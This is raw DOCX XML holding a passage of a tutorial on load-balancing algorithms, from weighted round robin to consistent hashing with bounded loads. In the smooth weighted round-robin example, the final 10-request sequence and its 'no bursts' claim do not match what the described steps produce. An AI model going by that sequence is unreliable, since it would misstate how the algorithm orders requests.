        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DA7557" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Assign weights proportional to capacity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD4371D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="288"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Server A (weight 5): 8 CPU cores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B532954" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="288"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Server B (weight 3): 4 CPU cores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50655488" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="288"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Server C (weight 2): 2 CPU cores</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A68B727" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>For every 10 requests: A gets 5, B gets 3, C gets 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E473386" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Smooth Weighted Round Robin (Nginx's algorithm):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C908C27" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Naive approach: send 5 consecutive requests to A, then 3 to B, then 2 to C. This creates bursts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205D5A02" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Nginx uses a smooth algorithm that interleaves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3852CE27" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>For weights {A:5, B:3, C:2} (total weight W=10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBB7653" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Each round, every server's current_weight increases by its configured weight. The server with the highest current_weight is selected, and its current_weight is decreased by the total weight W.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B724EB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A103240" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Step 1: A=5, B=3, C=2 → select A (highest) → A=5-10=-5, B=3, C=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6483C9" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Step 2: A=-5+5=0, B=3+3=6, C=2+2=4 → select B → A=0, B=6-10=-4, C=4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D209B40" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Step 3: A=0+5=5, B=-4+3=-1, C=4+2=6 → select C → A=5, B=-1, C=6-10=-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F0A8F0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Step 4: A=5+5=10, B=-1+3=2, C=-4+2=-2 → select A → ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498DCBFD" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Result: A, B, C, A, A, B, C, A, B, A — evenly interleaved, no bursts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD789B7" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Least Connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACB2564" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E666D75" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>Track active connection count for each backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A81EC5C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Route new request to the backend with fewest active connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35554A82" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="289"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Increment count on assignment, decrement on completion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241822D6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal state:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Per-server counter. Updated on every connection start/end.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFD3BC4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this is better than Round Robin for variable workloads:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EAA7BE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>If one request takes 5 seconds and others take 50ms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A320030" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="290"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Round Robin: The slow-request server gets the same number of new requests as others, piling up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3DF4F2" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="290"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Least Connections: The slow-request server naturally gets fewer new requests because its connection count stays high while others drain quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EADB00" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Weighted Least Connections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E08F34" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Don't just compare raw counts — normalize by weight:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE28FA3" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AD4093" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>score = active_connections / weight</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E931182" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Route to the server with the lowest score. A powerful server (weight 10) with 50 connections is preferred over a weak server (weight 2) with 15 connections (50/10=5 vs 15/2=7.5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B13745B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Least Response Time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24638F84" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A85873C" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="291"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Track average (or p95) response time for each backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA1B8D4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="291"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Route to the backend with the fastest recent response time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3C610D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal measurement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096406DE" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="292"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>The LB measures the time between forwarding the request to the backend and receiving the first byte (or complete response) back.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D682FA3" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="292"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Uses an exponentially weighted moving average (EWMA) to smooth out spikes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F87AE0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578EA41D" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>new_avg = α × latest_response_time + (1 - α) × old_avg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163AC3FB" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:lastRenderedPageBreak/>
        <w:t>Where α is typically 0.1–0.5 (lower = smoother, slower to react).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677D3226" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this is powerful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F9BDF6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>It automatically adapts to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF95E42" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Backend that's GC-ing (slower responses → less traffic → time to recover).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA1E64B" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Backend with a cold cache (slower until warm → gets less traffic → warms up with less pressure).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0C7655" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="293"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Hardware degradation (disk slowing down → detected via response time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B245F5E" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The downside — the "cold start" problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6B4D60" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>A new backend has no response time data. If assigned a default of 0ms ("assume fast"), it gets flooded with requests. If assigned infinity ("assume slow"), it never gets traffic to prove itself. Solution: initialize with the average of existing backends and ramp up gradually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68842680" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.5 IP Hash (Source Hashing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C5F968" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FDDCC1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670AA703" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>backend_index = hash(client_ip) % num_backends</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB60232" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The purpose:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Session persistence without cookies. The same client always hits the same backend.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F056A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Internal details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EFF97C2" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Must handle the case where a backend is removed (all its hashed clients must be redistributed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6DEF07" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Consistent hashing variant: minimizes redistribution when backends change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A77BBA1" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="294"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Problem: If many clients share an IP (corporate NAT, mobile carrier NAT), one backend gets disproportionate load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E65F265" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.6 Least Bandwidth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4810DD8A" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Routes to the server currently handling the least traffic in terms of Mbps (megabits per second).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0FD099" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Streaming/download servers where bandwidth, not connection count, is the limiting resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC252C6" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.7 Random with Two Choices (Power of Two Choices)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EE63ED" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7C4772" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Randomly pick TWO backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CDE423" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="295"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Route to the one with fewer active connections (or lower load).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B5F924" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this is remarkable (the mathematics):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5723BF88" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Pure random: maximum load on any server = O(log N / log log N) above average.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11779C00" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="296"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:t>Random with two choices: maximum load = O(log log N) above average.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34A86C70" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:t>This is an exponential improvement with almost zero overhead (one extra random number + one comparison).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C54E69F" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Behind the scenes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> This algorithm avoids the "herd" problem. With Least Connections, all new requests pile onto the same "least loaded" server simultaneously (because they all see the same global state). With two random choices, different requests pick different pairs, naturally spreading load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202024C0" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Envoy proxy, Netflix's load balancing library.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2E9C11" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.8 Consistent Hashing with Bounded Loads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7325E222" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Consistent hashing can lead to uneven distribution (one virtual node gets hot).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6127C4" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution (Google, 2017):</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Add a load bound. Each server accepts requests only up to (1 + ε) × average_load. If the hashed server exceeds this bound, move clockwise to the next server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3F55F5" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
      <w:r w:rsidRPr="00F15BD1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Effect:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15BD1">
        <w:t> Maintains the cache-friendliness of consistent hashing (same key usually goes to the same server = good for caches) while preventing hotspots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D163FC" w14:textId="77777777" w:rsidR="00F15BD1" w:rsidRPr="00F15BD1" w:rsidRDefault="00F15BD1" w:rsidP="00F15BD1">
